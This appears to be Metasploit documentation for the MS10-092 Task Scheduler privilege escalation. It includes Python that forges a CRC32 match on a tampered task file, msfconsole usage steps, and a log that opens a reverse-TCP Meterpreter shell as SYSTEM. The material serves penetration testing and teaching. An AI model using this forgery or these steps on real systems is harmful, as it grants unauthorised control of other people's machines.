## Vulnerable Application

This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, in a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.
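As an added illustration of why a CRC32 check offers no tamper resistance (example code, not part of the module): a constructed task XML is modified and four fix-up bytes are appended so that its CRC32 is unchanged, while an HMAC-SHA256 over the same bytes still detects the change. The XML, the paths and the key are constructed placeholders.

```python
import hashlib
import hmac
import zlib

# Constructed stand-in for a Task Scheduler 2.0 task file (real ones are
# UTF-16 XML; ASCII keeps the demo readable). Not taken from the module.
ORIGINAL = (
    b'<?xml version="1.0" encoding="UTF-16"?>\n'
    b'<Task version="1.2"><Actions><Exec>'
    b'<Command>C:\\Tools\\backup.exe</Command>'
    b'</Exec></Actions></Task>\n'
)

# Standard reflected CRC-32 table (polynomial 0xEDB88320, same as zlib.crc32).
_TABLE = []
for n in range(256):
    c = n
    for _ in range(8):
        c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
    _TABLE.append(c)
# Every table entry has a distinct top byte, so entries can be found by it.
_BY_TOP_BYTE = {t >> 24: i for i, t in enumerate(_TABLE)}


def crc32_fixup(data: bytes, target: int) -> bytes:
    """Return 4 bytes such that zlib.crc32(data + result) == target.

    CRC-32 is linear: walk the table backwards from the wanted register to
    learn which table index each of the last 4 steps must hit, then choose
    the bytes forwards from the register the data actually leaves behind.
    """
    reg = zlib.crc32(data) ^ 0xFFFFFFFF          # register before final XOR
    want = target ^ 0xFFFFFFFF                  # register we must end on
    indices, r = [], want
    for _ in range(4):
        i = _BY_TOP_BYTE[r >> 24]
        indices.append(i)
        r = ((r ^ _TABLE[i]) << 8) & 0xFFFFFFFF  # low byte is fixed below
    out = bytearray()
    for i in reversed(indices):
        out.append((reg ^ i) & 0xFF)
        reg = (reg >> 8) ^ _TABLE[i]
    return bytes(out)


def tamper_keeping_crc(task: bytes) -> bytes:
    """Change the command, then append a fix-up so the CRC32 stays the same."""
    modified = task.replace(b"C:\\Tools\\backup.exe", b"C:\\Temp\\other.exe")
    return modified + crc32_fixup(modified, zlib.crc32(task))


def integrity_checks(original: bytes, candidate: bytes, key: bytes) -> dict:
    """CRC32 passes on the tampered file; a keyed MAC does not."""
    tag = hmac.new(key, original, hashlib.sha256).digest()
    return {
        "crc32_matches": zlib.crc32(original) == zlib.crc32(candidate),
        "hmac_matches": hmac.compare_digest(
            hmac.new(key, candidate, hashlib.sha256).digest(), tag),
    }
```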
## Verification Steps

- Start msfconsole
- Get a Meterpreter session
- Do: `use modules/exploits/windows/local/ms10_092_schelevator`
- Do: `set SESSION <session id>`
- Do: `run`
## Options

### TASKNAME

A name for the created task (default is random).
## Scenarios

### Windows Server 2008 SP1 (x64)

```
msf6 > use exploit/windows/local/ms10_092_schelevator
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_092_schelevator) > set session 1
session => 1
msf6 exploit(windows/local/ms10_092_schelevator) > run
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Preparing payload at C:\Users\user\AppData\Local\Temp\QMGmEeEmFFq.exe
[*] Creating task: qThxbR37
[*] Reading the task file contents from C:\Windows\system32\tasks\qThxbR37...
[*] Original CRC32: 0xec6cfb1d
[*] Final CRC32: 0xec6cfb1d
[*] Writing our modified content back...
[*] Validating task: qThxbR37
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "qThxbR37" have been changed.
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "qThxbR37" have been changed.
[*] Executing the task...
[*] Sending stage (200774 bytes) to 192.168.200.218
[*] Meterpreter session 2 opened (192.168.200.130:4444 -> 192.168.200.218:52347) at 2022-08-19 00:53:17 -0400
[*] Deleting task pcT2p46d0...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-17B09RRRJTG
OS : Windows 2008 (6.0 Build 6001, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : CORP
Logged On Users : 3
Meterpreter : x64/windows
meterpreter >
```